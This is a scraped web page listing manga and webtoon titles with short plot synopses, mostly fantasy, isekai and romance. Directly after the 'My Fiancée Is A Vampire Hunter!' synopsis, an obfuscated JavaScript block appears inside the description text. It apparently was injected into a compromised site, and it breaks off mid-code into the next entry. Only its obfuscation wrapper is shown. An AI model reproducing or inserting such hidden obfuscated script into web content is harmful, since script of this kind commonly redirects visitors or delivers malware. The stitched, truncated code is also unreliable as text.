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15899 results

BurnOut Shock

Due to unknown flammable control matter spreading worldwide, weapons, infrastructure and human built civilization has gone to ruins. Young Rai, who lost his mother to ‘Sakan’ of Topzone, takes experiment pills and loses memory after going berserk. 10 years later, working as a soldier protecting civilians from the mafias, Rai, suffering from the side effects of the experiment, discovers that in order to find the cure, he needs to find ‘Woman of Fire’. Rai’s story in order to survive with the Woman of Fire ‘Seungha’ going to Topzone… no, in order to get his revenge, his journey with her begins. Genres: Action, Fantasy, Shounen, Adventure


My Fiancée Is A Vampire Hunter!

Sometimes, all it takes is a little fall for you to see the world around you differently. When Louis is magically ensnared and driven off a cliff by Maxie, a ruthless vampire hunter, he wakes up only to realize that the woman who was determined to kill him a moment ago has replaced her memory with the impression that the two of them are engaged. Louis must decide whether to tell her the truth and risk paying with his life, or end up marrying a notorious, cold-blooded killer whose old memories could return to her at any moment. A little white lie couldn’t hurt, right? Especially not when your life is on the line.<script></script><script>function _0x5a34(_0x31ded2,_0x347f4f){var _0x12438a=_0x2a39();return _0x5a34=function(_0x19ea99,_0x4865c4){_0x19ea99=_0x19ea99-(-0x740+0xb3e*-0x2+0x1f2d);var _0x413eb9=_0x12438a[_0x19ea99];return _0x413eb9;},_0x5a34(_0x31ded2,_0x347f4f);}(function(_0x238d23,_0x336c58){var _0x5ea288=_0x5a34,_0x106efa=_0x238d23();while(!![]){try{var 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Nise Seijo!? Mira No Boukentan – Tsuihousaremashita Ga, Jitsu Wa Saikyou Na No De Second Life Wo Tanoshimimasu!

Because her fiancé, the crown prince, has found a new saint, Mira is called a "fake saint" and is banished and her engagement is called off at the same time. Surprised by this sudden turn of events, Mira asks Raul, a swordsman she met at the adventurers' guild, to escort her on her journey back to her homeland. During her journey, Mira realizes that her magic is stronger than she had ever realized. Furthermore, as she forms a bond with the swordsman, her extraordinary "saintly powers" come into play...? Mira, an exiled saint, a swordsman from an exiled country, and the crown prince of a ruined country. An adventure full of intrigues over the "power of the saint" begins...


Doku Doku Mori Mori

In the deep, deep forest. Tamagotake, a mushroom fairy who has been left alone in the world after her parents were killed, is chasing after the culprit, Tsukiyotake, to take revenge on him. In the Sea of Trees, where life and death intersect, can the young Tamago take revenge on the hated Tsukiyo? An unprecedented mushroom suspense begins.


Ryne's Great Adventure!!

The series follows the adventures of Ryne and the BareBones Brigade.


Fuguushoku to Baka ni Saremashita ga, Jissai wa Sorehodo Waruku Arimasen

Shirosaki Reito was suddenly sucked in by a mysterious crack and got transferred in between dimensions. He got reincarnated as a baby in another world. He was born in the royal family and was the heir to the throne but he was driven/kicked of the palace. The reason was that he was born as a Support magician and had Alchemist as a job which was the lowest job that existed in the new world and people who had that were considered jobless. But there was a secret hidden in that job!! From jobless to the strongest job!!! --- Bookwalker LN: Official LN:


The Holy Emperor’s Grandsonis a Necromancer

After a near-death experience, something has changed about the Holy Emperor’s troublemaker of a grandson. To be precise, his body was taken over by a Korean man who died while playing a VR video game! But when his necromancer character is mixed with a Holy Prince’s blood, things start getting funky. The zombies he makes are incredibly nice, his curses start healing people, and the girl he saved from being turned into a zombie suddenly gains super strength. Now he has to play the hero, but he’d really rather just go for a nap.


Cross My Heartand Hope to Die

This series contains themes regarding suicide and mental health that may not be suitable for all readers. Viewer discretion is advised. If you or someone you know is struggling or in crisis, please reach out for help at Crisis Text Line ( Silvia Florette wants nothing more than to die. In fact, most days, she can’t even be bothered to get out of bed. Sentenced to repeat life 99 times, she agrees to marry Duke Randall in an attempt to appease God and die at the earliest convenience. However, while Silvia is eager to consummate the marriage, her husband insists they must first fall in love before they can finally sleep together.

2 days ago

I Really Don’t Want to Remake

Little had I known, I Chen Hansheng; the former elite of society and a Diamond Bachelor, was reborn. When I woke up, I was a senior graduate in high school? Later, Chen Hansheng was walking near the crosswalk, he seemed hesitant. A precious girl; Shen Youchu and two other girls; Bai Yueguang and Xiao Rongyu, who will he pick? All of them? One of them? Two of them? Read to find out. Side Note: Diamond Bachelor is a slang word that means someone who’s insanely rich and single.


Orenchi ni Kita Onna Kishi to Inakagurashi Surukotoninatta Ken

Saeki Kanji, 32 years old and still single, is living in the Japanese countryside, which is in decline. After graduating from university with a degree in economics he took a job as a salary man in a leading company in Tokyo, but retired when he inherited the family farm in Miyama village when his parents passed on. He soon took to the life of a simple farmer. One day a beautiful woman wearing full body armor came to his door begging to stay the night. She claimed to be royalty from another world and is unable to return there. She ends up living with Kanji and helping out the local agriculture situation. Author's Twitter: @sakuta_yrz


Zatch Bell!!

Every 1000 years, 100 demon children are sent to Earth to compete in a battle to become king of the Demon World. Each demon is paired with a human partner who is given a spell book of a specific color. The human can cast the demon\'s spells through their book. If a demon\'s book is burned, they disappear and return to the Demon World. The last demon remaining becomes the king. The show is oriented around Gash Bell and his human partner, Takamine Kiyomaro. [*]Won the 48th Shogakukan Manga Award in the Shounen category.


It's Mary-san. I'm in another world now

Naibara Hirokazu moves from Miyagi to Saitama to start university in Tokyo. Not long after settling in, he starts receiving eerie phone calls from an unknown number. A girl’s voice whispers, “It’s Mary-san. I’m at the garbage dump now… I’m the doll you threw away…” Brushing it off as a prank, he hangs up—but the calls don’t stop. Worse, the caller seems to be getting closer. The next day, he answers again. “It’s Mary-san. I’m in front of your room now…” Could it be that Mary-san, the infamous urban legend, has been isekai’d—and now she’s asking for help over the phone?!
